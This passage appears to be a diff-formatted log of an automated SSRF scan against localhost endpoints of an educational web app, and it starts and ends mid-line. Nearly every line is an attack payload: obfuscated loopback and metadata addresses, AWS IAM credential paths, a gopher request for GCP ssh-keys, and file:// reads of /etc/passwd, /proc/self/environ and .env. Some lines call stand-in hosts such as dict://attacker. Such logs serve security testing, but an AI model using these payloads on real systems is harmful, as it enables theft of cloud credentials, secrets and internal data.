`http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/teaching_periods?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/teaching_periods?url=2130706433%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=3232235521%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=3232235777%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/teaching_periods?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/teaching_periods?url=0%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=localtest.me` +- Testing: `http://localhost:4200/api/teaching_periods?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/teaching_periods?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/teaching_periods?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/teaching_periods?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.1.3` +- Testing: `http://localhost:4200/api/teaching_periods?url=0` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost` +- Testing: `http://localhost:4200/api/teaching_periods?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/teaching_periods?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/teaching_periods?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/teaching_periods?url=7F000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=2130706433` +- Testing: `http://localhost:4200/api/teaching_periods?url=6425673729` +- Testing: `http://localhost:4200/api/teaching_periods?url=127001` +- Testing: `http://localhost:4200/api/teaching_periods?url=127_0._0_1` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/teaching_periods?url=localtest.me` +- Testing: `http://localhost:4200/api/teaching_periods?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.127.127.127` +- Testing: `http://localhost:4200/api/teaching_periods?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=017700000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/teaching_periods?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/teaching_periods?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/teaching_periods?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254` +- Testing: `http://localhost:4200/api/teaching_periods?url=2852039166` +- Testing: `http://localhost:4200/api/teaching_periods?url=7147006462` +- Testing: `http://localhost:4200/api/teaching_periods?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/teaching_periods?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/teaching_periods?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/teaching_periods?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/teaching_periods?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/teaching_periods?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/teaching_periods?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/teaching_periods?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/teaching_periods?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/teaching_periods?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/teaching_periods?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/teaching_periods?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/teaching_periods?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/teaching_periods?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/teaching_periods?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/teaching_periods?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/teaching_periods?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.0` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=3232235521` +- Testing: `http://localhost:4200/api/teaching_periods?url=3232235777` +- Testing: `http://localhost:4200/api/teaching_periods?url=425.510.425.510` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/teaching_periods?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=instance-data` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A443` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A443` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/teaching_periods?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/teaching_periods?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/teaching_periods?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/teaching_periods?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/teaching_periods?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/teaching_periods?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/teaching_periods?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/teaching_periods?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/teaching_periods?url=2130706433%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=3232235521%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=3232235777%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/teaching_periods?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/teaching_periods?url=0%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/tii_actions +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/tii_actions?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_actions?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/tii_actions?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=0` +- Testing: `http://localhost:4200/api/tii_actions?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tii_actions?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tii_actions?url=2130706433` +- Testing: `http://localhost:4200/api/tii_actions?url=017700000001` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f000001` +- Testing: `http://localhost:4200/api/tii_actions?url=google.com%40127.0.0.1` +- Testing: 